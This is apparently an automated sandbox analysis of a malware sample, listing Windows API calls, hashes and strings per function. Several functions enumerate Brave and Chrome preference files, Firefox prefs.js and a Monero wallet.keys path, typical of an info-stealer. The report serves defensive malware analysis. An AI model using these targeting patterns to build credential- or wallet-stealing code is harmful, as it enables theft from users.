                                • Opcode Fuzzy Hash: f2adac6829c95187bba53b9ab19aa6f3eb19378bb1196d9e34356e1013c436eb
                                • Instruction Fuzzy Hash: 6DE012B592430963CF0073B0AD0FF2A329C9B1574DF080825FA05D3102FA25F805A67A
                                APIs
                                • wsprintfA.USER32 ref: 00D938CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D938E3
                                • lstrcat.KERNEL32(?,?), ref: 00D93935
                                • StrCmpCA.SHLWAPI(?,00DA0F70), ref: 00D93947
                                • StrCmpCA.SHLWAPI(?,00DA0F74), ref: 00D9395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D93C67
                                • FindClose.KERNEL32(000000FF), ref: 00D93C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 759a49bad4fd0577284adf68706fb7401a1a98fc87b14522306822fa6c682215
                                • Instruction ID: a2109918f611b35500763aa4eaeeece2dd7844402f47e3afd5d1d1c587d02fea
                                • Opcode Fuzzy Hash: 759a49bad4fd0577284adf68706fb7401a1a98fc87b14522306822fa6c682215
                                • Instruction Fuzzy Hash: F9A12FB190021CABDB24DBA4DD85FEA7379FF48304F084588A64997141EB75AB88CF72
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00DA0B32,00DA0B2B,00000000,?,?,?,00DA13F4,00DA0B2A), ref: 00D8BEF5
                                • StrCmpCA.SHLWAPI(?,00DA13F8), ref: 00D8BF4D
                                • StrCmpCA.SHLWAPI(?,00DA13FC), ref: 00D8BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00D8C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: e66dcce4897b5dd7e5abe75f3e63bd2e662dc2d81f6694b95cfbf7e20250cd1f
                                • Instruction ID: a6cd65b3f17b0302e434f8cee751c14148a3c7a5314079f65c3f80d43583a25c
                                • Opcode Fuzzy Hash: e66dcce4897b5dd7e5abe75f3e63bd2e662dc2d81f6694b95cfbf7e20250cd1f
                                • Instruction Fuzzy Hash: 2F422D72910118ABCF14FBB4DD96EEE737DEF94300F404558B90A96191EE34AA49CBF2
                                APIs
                                • wsprintfA.USER32 ref: 00D9492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D94943
                                • StrCmpCA.SHLWAPI(?,00DA0FDC), ref: 00D94971
                                • StrCmpCA.SHLWAPI(?,00DA0FE0), ref: 00D94987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D94B7D
                                • FindClose.KERNEL32(000000FF), ref: 00D94B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: d38ed5c283f639aca7594db3c2855327061578cefa871787a85e431dc8e46152
                                • Instruction ID: e9219994447ebf47ff0a2f49e09babeb97d1d7827be6a63ab3bf95f65c2bbaf0
                                • Opcode Fuzzy Hash: d38ed5c283f639aca7594db3c2855327061578cefa871787a85e431dc8e46152
                                • Instruction Fuzzy Hash: B86152B290021CAFCB20EBA0DD49EEA737CBF48704F044588B64996041EA35EB498FB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D94580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D94587
                                • wsprintfA.USER32 ref: 00D945A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D945BD
                                • StrCmpCA.SHLWAPI(?,00DA0FC4), ref: 00D945EB
                                • StrCmpCA.SHLWAPI(?,00DA0FC8), ref: 00D94601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D9468B
                                • FindClose.KERNEL32(000000FF), ref: 00D946A0
                                • lstrcat.KERNEL32(?,0182EAB8), ref: 00D946C5
                                • lstrcat.KERNEL32(?,0182D860), ref: 00D946D8
                                • lstrlen.KERNEL32(?), ref: 00D946E5
                                • lstrlen.KERNEL32(?), ref: 00D946F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 16cd7094f299064116e79807f2977a505f0d8927a0e032133433a18d1a383747
                                • Instruction ID: 1aa148174a59f88f7d81bfde69bdb4b3f2be9772a865a5823e4e14c7dd3d2c83
                                • Opcode Fuzzy Hash: 16cd7094f299064116e79807f2977a505f0d8927a0e032133433a18d1a383747
                                • Instruction Fuzzy Hash: E55153B154021CABCB20EB70DD8AFED777CAF54704F404588B60993191EB75AB899FB1
                                APIs
                                • wsprintfA.USER32 ref: 00D93EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D93EDA
                                • StrCmpCA.SHLWAPI(?,00DA0FAC), ref: 00D93F08
                                • StrCmpCA.SHLWAPI(?,00DA0FB0), ref: 00D93F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D9406C
                                • FindClose.KERNEL32(000000FF), ref: 00D94081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 1bb34b33ddba045d1da562ef696e13e080027c5adc1c4862758b3c4c4095fef9
                                • Instruction ID: f83177994b80697217d40b383f282a916afe0ee13d98f86d7d0fa45c76f398bf
                                • Opcode Fuzzy Hash: 1bb34b33ddba045d1da562ef696e13e080027c5adc1c4862758b3c4c4095fef9
                                • Instruction Fuzzy Hash: B45136B690021CABCB24EBB0DD46EEA737CFF44704F444588B65996080DB75EB899FB1
                                APIs
                                • wsprintfA.USER32 ref: 00D8ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00D8ED55
                                • StrCmpCA.SHLWAPI(?,00DA1538), ref: 00D8EDAB
                                • StrCmpCA.SHLWAPI(?,00DA153C), ref: 00D8EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00D8F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 9cec7fc5a7bb2fab012bcf45fcd8a333846d342a90c3879764c53c724bfcbfb1
                                • Instruction ID: e9d9d976c18728356cbc8720414fba96544fe3e6b0dcce4851f202b4edf814d3
                                • Opcode Fuzzy Hash: 9cec7fc5a7bb2fab012bcf45fcd8a333846d342a90c3879764c53c724bfcbfb1
                                • Instruction Fuzzy Hash: F5E19F73911128AADF55FB64DD52EEE7378EF54300F404599B50A62092EE306F8ACFB2
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DA15B8,00DA0D96), ref: 00D8F71E
                                • StrCmpCA.SHLWAPI(?,00DA15BC), ref: 00D8F76F
                                • StrCmpCA.SHLWAPI(?,00DA15C0), ref: 00D8F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00D8FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: b29178dcc12b304c218fb62d3d0f10cd2dab3295a1df04625a57db7ce7fe2711
                                • Instruction ID: f5a25eca013e707c78551704d65f44872be19c7a2b55164ec559f3c34dfc6651
                                • Opcode Fuzzy Hash: b29178dcc12b304c218fb62d3d0f10cd2dab3295a1df04625a57db7ce7fe2711
                                • Instruction Fuzzy Hash: DDB1FE729101189BDF24FB64DD96AEE7379EF54300F4085A9A40A97191EF30AB49CFF2
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DA510C,?,?,?,00DA51B4,?,?,00000000,?,00000000), ref: 00D81923
                                • StrCmpCA.SHLWAPI(?,00DA525C), ref: 00D81973
                                • StrCmpCA.SHLWAPI(?,00DA5304), ref: 00D81989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D81D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00D81DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D81E20
                                • FindClose.KERNEL32(000000FF), ref: 00D81E32
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 7381834bbf899f9a39dfbe236f7a9308a0b4fdf6c65091bb1da20d0ac0919b53
                                • Instruction ID: 07c1e854138e98c64b9a0f7bca79265f0e022bc6e4cd727c4c87eae68bc82d88
                                • Opcode Fuzzy Hash: 7381834bbf899f9a39dfbe236f7a9308a0b4fdf6c65091bb1da20d0ac0919b53
                                • Instruction Fuzzy Hash: C4129A72920128AADF19FB64DC96AEE7378EF54300F404599A50A66091EF706F89CFF1
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00DA0C2E), ref: 00D8DE5E
                                • StrCmpCA.SHLWAPI(?,00DA14C8), ref: 00D8DEAE
                                • StrCmpCA.SHLWAPI(?,00DA14CC), ref: 00D8DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00D8E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 18e816a55811d43dfc4665c89392099d0187b97ee3fc53563507c6d4f06cab89
                                • Instruction ID: 42785697010d0b139d3e6f5034a6fef0419a15739b9fb6fb32c90655b80d1211
                                • Opcode Fuzzy Hash: 18e816a55811d43dfc4665c89392099d0187b97ee3fc53563507c6d4f06cab89
                                • Instruction Fuzzy Hash: DBF17E728241289ADF15FB64DC96EEE7378FF54300F8041D9A41A62091EF706B4ACFB1
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00DA14B0,00DA0C2A), ref: 00D8DAEB
                                • StrCmpCA.SHLWAPI(?,00DA14B4), ref: 00D8DB33
                                • StrCmpCA.SHLWAPI(?,00DA14B8), ref: 00D8DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00D8DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 11f1f24b96cddbd9bd36b38dda12d6c28091394f4999df41376fcab61b6e3686
                                • Instruction ID: da075d377209da825d3093e45bb582a8b8be69c98a55908e8f1436a99f649473
                                • Opcode Fuzzy Hash: 11f1f24b96cddbd9bd36b38dda12d6c28091394f4999df41376fcab61b6e3686
                                • Instruction Fuzzy Hash: 9E91FE73910118ABCF14FBB4ED569ED737DEF84304F408658A90A96181EE34AB198BF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: Us$e9o$.*6{$M~}}$QPs$Tqw$k}$q8{
                                • API String ID: 0-2272092212
                                • Opcode ID: 3c679804cfabece03ddfc43286e4a05e74372d1d898f77ad7402592321ae772e
                                • Instruction ID: 1f8fce79b391dfb68cd5f1578005c8797d2d6948d384695ffed24f36b84eefa3
                                • Opcode Fuzzy Hash: 3c679804cfabece03ddfc43286e4a05e74372d1d898f77ad7402592321ae772e
                                • Instruction Fuzzy Hash: F0B208F36082149FE304AE2DEC8567AF7E9EF94720F1A853DEAC5C3744EA3558018697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: .!t/$>N}$GSs}$V'|$jG|/$o*v$z/=_$7=~
                                • API String ID: 0-2346698372
                                • Opcode ID: 150e11e2a1f1ac92cb7ed3d5e0592602e46cdac382a720148caa0a7da0cdf789
                                • Instruction ID: 9ba62a58f383b97f20ec842baaeecc55ddce6f07d6a0e0c6a9072cbc35267038
                                • Opcode Fuzzy Hash: 150e11e2a1f1ac92cb7ed3d5e0592602e46cdac382a720148caa0a7da0cdf789
                                • Instruction Fuzzy Hash: 2AB238F360C2049FE3086E2DEC8567AB7E9EF94720F1A863DE6C5C3744EA3558058697
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00DA05AF), ref: 00D97BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00D97BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D97C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D97C62
                                • LocalFree.KERNEL32(00000000), ref: 00D97D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 12fdac9f3b8b1c37b01ec581a4c5072cb11756dcd18fcaba09ff05df70e08172
                                • Instruction ID: 041b6ee7e4bce4c66485ac309b2513812f702bfc12e134f5e8202d4529a76766
                                • Opcode Fuzzy Hash: 12fdac9f3b8b1c37b01ec581a4c5072cb11756dcd18fcaba09ff05df70e08172
                                • Instruction Fuzzy Hash: B2411872950228ABDB24DB94DC99BEEB7B8FF48700F604199E10962191DB346F85CFB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: 1o$5}3o$G<$`1s$f$og$qq?n$Fz6
                                • API String ID: 0-1291997573
                                • Opcode ID: 6ff01f6bbc7e0e3ee27f4f6f28443d4f789b7fcc63f64dee63bdfe4ab84b9d56
                                • Instruction ID: 6f6d89635e12730a4f0bd227e1e785e921d10af6a60d270d0454c972896f39b8
                                • Opcode Fuzzy Hash: 6ff01f6bbc7e0e3ee27f4f6f28443d4f789b7fcc63f64dee63bdfe4ab84b9d56
                                • Instruction Fuzzy Hash: 21B219F3A0C2049FE314AE2DEC8567AFBE9EF94320F1A453DEAC5C3744E67558058692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: !Iw-$@gY$h[]&$t}$)^s$7\$Yc
                                • API String ID: 0-1492173068
                                • Opcode ID: 50db1641fce0acb477a71c40bc2f322a5bcdb22cf413f4c8582c73fbc99c2caa
                                • Instruction ID: ed5b08b5df9103a14154de09ff0c820db120ccb57559db1d4eefa8b0723b63ea
                                • Opcode Fuzzy Hash: 50db1641fce0acb477a71c40bc2f322a5bcdb22cf413f4c8582c73fbc99c2caa
                                • Instruction Fuzzy Hash: 8DA218F360C2049FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E63598058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: +Uo$-4}$9R?$FUwC$a7s{$a7s{$mg]
                                • API String ID: 0-2109487440
                                • Opcode ID: 161edaff18559f33cb3a926af0529a6883f596a16328abd0883a2585a91fda97
                                • Instruction ID: d1dde57f26bdeaa7118fa17a3fc21fdecd03b4edbc5b7a575c740518b20dd023
                                • Opcode Fuzzy Hash: 161edaff18559f33cb3a926af0529a6883f596a16328abd0883a2585a91fda97
                                • Instruction Fuzzy Hash: D3A229F360C2009FE704AE2DEC8567ABBE5EF94320F164A3DE6C4C7744EA3598458697
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00DA0D73), ref: 00D8E4A2
                                • StrCmpCA.SHLWAPI(?,00DA14F8), ref: 00D8E4F2
                                • StrCmpCA.SHLWAPI(?,00DA14FC), ref: 00D8E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00D8EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: a94b9b31c70e1d0785b1314db47482cb3ad1f46ed0ea32e1f01940a10aa90612
                                • Instruction ID: dcf945ed6d637a4ed12791da83e06bb091927ced2bf60765612929a40ca11763
                                • Opcode Fuzzy Hash: a94b9b31c70e1d0785b1314db47482cb3ad1f46ed0ea32e1f01940a10aa90612
                                • Instruction Fuzzy Hash: 5812EA72910128AADF18FB68DD96EED7379EF54300F4045A9B50A96091EE306F49CFF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: +I~$,<{{$D8Wo$ffU_$wo$xC
                                • API String ID: 0-1548725151
                                • Opcode ID: e9b61f4a1a4300356467bdb17de129b23d92cf661562db0c03cf2ab5bc0de7f4
                                • Instruction ID: e346b485643e5405596b0cae60da35b2312a15f02fad133d343fb4e9c5643fa0
                                • Opcode Fuzzy Hash: e9b61f4a1a4300356467bdb17de129b23d92cf661562db0c03cf2ab5bc0de7f4
                                • Instruction Fuzzy Hash: 80B2D6B360C200AFE3046E2DEC8567ABBE9EFD4720F1A493DEAC5C7744E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'lv$V>kg$a*+$a1s!$wH~{$"f>
                                • API String ID: 0-393504497
                                • Opcode ID: 816fc23a1eb80431c4c7e8700a0b50150845a4fcdee139b31baef633997ba5b3
                                • Instruction ID: 1f82b8ffb535f7d1ed50ebb38bdd5f776269482698511456f9cb67554b8b20f9
                                • Opcode Fuzzy Hash: 816fc23a1eb80431c4c7e8700a0b50150845a4fcdee139b31baef633997ba5b3
                                • Instruction Fuzzy Hash: 43B2E2F360C204AFE7086E2DEC8567ABBE9EF94320F16493DE6C5C7744EA3558408697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ONn^$W*g7$e=am$yi{{$V}7
                                • API String ID: 0-413107333
                                • Opcode ID: 1171b7a7396845b71c266bf6dfde8909829f75a72f854418243ea70c9ec49a86
                                • Instruction ID: 5b58f7db8c1b2ae4b0ebf7dbdb4abf524f841ec82b158086fed2a3245ee7e7ad
                                • Opcode Fuzzy Hash: 1171b7a7396845b71c266bf6dfde8909829f75a72f854418243ea70c9ec49a86
                                • Instruction Fuzzy Hash: 16B219F36082009FE708AF2DEC9567ABBE9EFD4320F1A453DE6C5C7744E63558018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
